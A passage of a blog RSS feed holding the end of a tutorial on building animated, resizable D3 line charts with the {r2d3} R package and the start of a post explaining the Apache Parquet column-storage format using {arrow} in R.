&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;let&lt;/span&gt; l &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.getTotalLength(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d3.interpolateString(&lt;span style="color:#a5d6ff"&gt;&amp;#34;0,&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; l, l &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; l);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(t) { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; i(t) };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; lineTransition(path) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; path.transition()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .duration(&lt;span style="color:#a5d6ff"&gt;2500&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attrTween(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stroke-dasharray&amp;#34;&lt;/span&gt;, tweenDash)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .on(&lt;span style="color:#a5d6ff"&gt;&amp;#34;end&amp;#34;&lt;/span&gt;, () =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; drawLabels();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, wrap your line-drawing code (the code chunk starting with &lt;code&gt;let path =&lt;/code&gt;) in a new function called &lt;code&gt;drawLines()&lt;/code&gt;. We add two new lines at the
top that remove any previously drawn lines and labels. We also chain on a
call to the &lt;code&gt;lineTransition()&lt;/code&gt; function at the end of our path code.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; drawLines() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// remove previously drawn lines when re-drawing
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; plotGroup.selectAll(&lt;span style="color:#a5d6ff"&gt;&amp;#34;.drawn_lines&amp;#34;&lt;/span&gt;).remove()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// remove labels e.g. &amp;#34;Daphne&amp;#34; when re-drawing
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; plotGroup.selectAll(&lt;span style="color:#a5d6ff"&gt;&amp;#34;.name_labels&amp;#34;&lt;/span&gt;).remove()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;code which starts &lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;let path =&amp;#39;&lt;/span&gt; goes here&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .call(lineTransition)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, add a line to call our new &lt;code&gt;drawLines()&lt;/code&gt; function at the bottom
of the script.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;drawLines()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;svg id="scooby_final"&gt;
&lt;/svg&gt;
&lt;script src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/scooby_scripts/scoobydoo_final.js"&gt;&lt;/script&gt;
&lt;button type="button" onclick="plotFlexFinal($(&amp;#39;.blog-content&amp;#39;).width())" id="draw_lines_btn"&gt;
Animate!
&lt;/button&gt;
&lt;p&gt;Now we have a working, animated D3 visualisation! I’ve added a button
to the blogpost to redraw the plot, but you should see the graph animate
as you re-run your &lt;code&gt;r2d3()&lt;/code&gt; line.&lt;/p&gt;
&lt;h2 id="make-it-resizable"&gt;Make it resizable&lt;/h2&gt;
&lt;p&gt;You might’ve already noticed that your local plot is of a static size
and if you resize your RStudio window, your plot gets cut off. Luckily,
{r2d3} comes with built-in width and height objects that change based on
the size of the plot container. This means that we can use these
variables to make our plot flexibly resize as we resize the window.&lt;/p&gt;
&lt;p&gt;To keep the margins, plot width and height, and line and text sizes in
proportion to each other, replace the constant-defining code at the top
of your script with the following. You can play around with the
multipliers to change the relationships between the sizes.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; margin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {top&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.1&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; width,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; right&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.125&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; width,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bottom&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.05&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; width,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; left&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.075&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; width}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; plotWidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; width &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.left &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.right
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; plotHeight &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; height &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.top &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.bottom
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; lineWidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.004&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; plotWidth
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; mediumText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.03&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; plotWidth
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; bigText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.04&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; plotWidth
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, if you re-run your plot, it should automatically resize when you
change the size of the window. And notice, because the plot is an SVG
(&lt;strong&gt;scalable&lt;/strong&gt; vector graphics) element, our plot stays sharp as we make
it bigger or smaller.&lt;/p&gt;
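&lt;p&gt;As a rough check of how the multipliers behave, the sketch below wraps the same arithmetic in a function and evaluates it for two container sizes. The function name &lt;code&gt;computeLayout()&lt;/code&gt; and the example sizes are assumptions for illustration. In {r2d3} itself, &lt;code&gt;width&lt;/code&gt; and &lt;code&gt;height&lt;/code&gt; are supplied for you.&lt;/p&gt;

```javascript
// Hypothetical helper: derives every size from the container dimensions,
// using the same multipliers as the constants defined above.
function computeLayout(width, height) {
  const margin = {
    top: 0.1 * width,
    right: 0.125 * width,
    bottom: 0.05 * width,
    left: 0.075 * width,
  };
  const plotWidth = width - margin.left - margin.right;
  const plotHeight = height - margin.top - margin.bottom;
  return {
    margin,
    plotWidth,
    plotHeight,
    lineWidth: 0.004 * plotWidth,
    mediumText: 0.03 * plotWidth,
    bigText: 0.04 * plotWidth,
  };
}

// Assumed container sizes in pixels, for illustration only
const small = computeLayout(400, 300);
const large = computeLayout(800, 600);

// Doubling the container doubles the plot width, line width and text sizes
console.log(small.plotWidth, large.plotWidth);
console.log(small.bigText, large.bigText);
```

&lt;p&gt;Because every size is a fixed fraction of the width, the proportions of the plot stay the same at any scale.&lt;/p&gt;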
&lt;hr&gt;
&lt;p&gt;&lt;a href="https://github.com/jumpingrivers/blog"
style="font-size:25px"&gt;
&lt;img class="image-left"
src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/gh_logo.png"
style="width:32px; class:image-left"/&gt;
  Get the final .Rmd and .js files&lt;/a&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;We’ve now created our first D3 visualisation from scratch using the
{r2d3} package in RStudio! As you can see, creating a line chart with
many lines requires a lot of code and so, if you’re creating a basic
plot for non-aesthetic purposes, sticking to {ggplot2} may make more
sense. However, if you want your plot to be an interactive website
statement piece or a creative, user-driven exploration of data or ideas,
D3 may better suit your needs. As this blogpost was aimed at beginners,
the end result is not particularly dramatic, but if this has inspired
you to learn more, I have provided some links to some amazing D3
creators and resources below.&lt;/p&gt;
&lt;h2 id="further-resources"&gt;Further resources&lt;/h2&gt;
&lt;p&gt;If you are looking for more comprehensive materials to learn D3, I
highly recommend these two video tutorials by Curran Kelleher: &lt;a href="https://www.youtube.com/watch?v=_8V5o2UHG0E" rel="external"&gt;Data
Visualization with D3.js&lt;/a&gt;
and &lt;a href="https://www.youtube.com/watch?v=2LhoCfjm8R4" rel="external"&gt;Data Visualization with D3, JavaScript,
React&lt;/a&gt;. Moreover, &lt;a href="https://www.d3-graph-gallery.com/" rel="external"&gt;The
D3.js Graph Gallery&lt;/a&gt; by Yan Holtz is
a good reference website to see what kind of plots you can make and how.
Check out &lt;a href="https://observablehq.com/@d3/gallery" rel="external"&gt;Observable&lt;/a&gt; for plenty
of creative community-made D3 visualisations. Finally, if you need to be
convinced that you can make cool stuff in D3, I highly recommend
checking out &lt;a href="https://shirleywu.studio/" rel="external"&gt;Shirley Wu&lt;/a&gt;, &lt;a href="https://www.visualcinnamon.com/" rel="external"&gt;Nadieh
Bremer&lt;/a&gt;, and &lt;a href="https://wattenberger.com/" rel="external"&gt;Amelia
Wattenberger&lt;/a&gt;.&lt;/p&gt;
&lt;style&gt;
#draw_lines_btn {
display: block;
padding: 12px 22px;
color: #fff;
background-color: #4898a8;
border: 1px solid #4898a8;
font-family: "Lato", sans-serif;
border-radius: 4px;
cursor: pointer;
transition: 0.4s;
margin-bottom: 30px;
z-index: 3;
}
#draw_lines_btn:hover {
background-color: #5aaf50;
border: 1px solid #5aaf50;
}
&lt;/style&gt;
&lt;script&gt;
window.onresize = (event) =&gt; {
plotFlex1($(".blog-content").width())
plotFlex2($(".blog-content").width())
plotFlex3($(".blog-content").width())
plotFlexFinal($(".blog-content").width())
};
&lt;/script&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Understanding the Parquet file format</title><link>https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/</link><pubDate>Mon, 27 Sep 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/parquet-logo.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part of a series of related posts on Apache Arrow. Other posts
in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/"&gt;Understanding the Parquet file format&lt;/a&gt; (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/" rel="external"&gt;Reading and Writing Data with
{arrow}&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/arrow-rds-parquet-comparison/" rel="external"&gt;Parquet vs the RDS
Format&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://parquet.apache.org/" rel="external"&gt;Apache Parquet&lt;/a&gt; is a popular column
storage file format used by Hadoop systems, such as Pig,
&lt;a href="https://spark.apache.org/" rel="external"&gt;Spark&lt;/a&gt;, and Hive. The file format is
language independent and has a binary representation. Parquet is used to
efficiently store large data sets and has the extension &lt;code&gt;.parquet&lt;/code&gt;. This
blog post aims to understand how parquet works and the tricks it uses to
efficiently store data.&lt;/p&gt;
&lt;p&gt;Key features of parquet are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;it’s cross platform&lt;/li&gt;
&lt;li&gt;it’s a recognised file format used by many systems&lt;/li&gt;
&lt;li&gt;it stores data in a column layout&lt;/li&gt;
&lt;li&gt;it stores metadata&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The latter two points allow for efficient storage and querying of data.&lt;/p&gt;
&lt;h2 id="column-storage"&gt;Column Storage&lt;/h2&gt;
&lt;p&gt;Suppose we have a simple data frame:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tibble&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;n1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;n2&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;n3&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; age &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;35&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;62&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 3 × 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; id name age&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 1 n1 20&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 2 n2 35&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 3 n3 62&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we stored this data set as a CSV file, what we see in the R terminal
is mirrored in the file storage format. This is &lt;em&gt;row&lt;/em&gt; storage. This is
efficient for file queries such as,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;SELECT&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72"&gt;FROM&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72"&gt;table_name&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72"&gt;WHERE&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;id&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We simply go to the 2nd row and retrieve that data. It’s also very easy
to append rows to the data set - we just add a row to the bottom of the
file. However, if we want to sum the data in the &lt;code&gt;age&lt;/code&gt; column, then this
is potentially inefficient. We would need to determine which value on
each row is related to &lt;code&gt;age&lt;/code&gt;, and extract that value.&lt;/p&gt;
&lt;p&gt;Parquet uses column storage. In column layouts, column data are stored
sequentially.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;n1&lt;span style="color:#6e7681"&gt; &lt;/span&gt;n2&lt;span style="color:#6e7681"&gt; &lt;/span&gt;n3&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;35&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;62&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With this layout, queries such as&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;SELECT&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72"&gt;FROM&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;table_name&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72"&gt;WHERE&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;id&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;are now inconvenient. But if we want to sum up all ages, we simply go to
the third row and add up the numbers.&lt;/p&gt;
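&lt;p&gt;The trade-off between the two layouts can be sketched with in-memory data structures. The example below uses plain JavaScript rather than R, and the variable names are assumptions for illustration. Arrays in memory only stand in for bytes on disk, so this shows the access pattern, not how Parquet is implemented.&lt;/p&gt;

```javascript
// Row layout: one record per row, as in a CSV file
const rows = [
  { id: 1, name: "n1", age: 20 },
  { id: 2, name: "n2", age: 35 },
  { id: 3, name: "n3", age: 62 },
];

// Column layout: the values of each column are stored together
const columns = {
  id: [1, 2, 3],
  name: ["n1", "n2", "n3"],
  age: [20, 35, 62],
};

// Row layout: summing ages visits every record and picks out one field
const sumFromRows = rows.reduce((total, row) => total + row.age, 0);

// Column layout: the ages already sit next to each other
const sumFromColumns = columns.age.reduce((total, age) => total + age, 0);

// Fetching one whole record is the reverse: in the column layout we must
// look up the same position in every column and stitch the values together
const position = columns.id.indexOf(2);
const recordFromColumns = Object.fromEntries(
  Object.keys(columns).map((key) => [key, columns[key][position]])
);

console.log(sumFromRows, sumFromColumns); // 117 117
console.log(recordFromColumns); // { id: 2, name: 'n2', age: 35 }
```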
&lt;h2 id="reading-and-writing-parquet-files"&gt;Reading and writing parquet files&lt;/h2&gt;
&lt;p&gt;In R, we read and write parquet files using the {arrow} package.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# install.packages(&amp;#34;arrow&amp;#34;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;arrow&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;packageVersion&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;arrow&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#39;14.0.0.2&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To create a parquet file, we use &lt;code&gt;write_parquet()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Use the penguins data set&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(penguins, package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;palmerpenguins&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a temporary file for the output&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;parquet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempfile&lt;/span&gt;(fileext &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.parquet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_parquet&lt;/span&gt;(penguins, sink &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; parquet)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To read the file, we use &lt;code&gt;read_parquet()&lt;/code&gt;. One of the benefits of using
parquet is small file sizes. This is important when dealing with large
data sets, especially once you start incorporating the cost of cloud
storage. Reduced file size is achieved via two methods:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;File compression. This is specified via the &lt;code&gt;compression&lt;/code&gt; argument
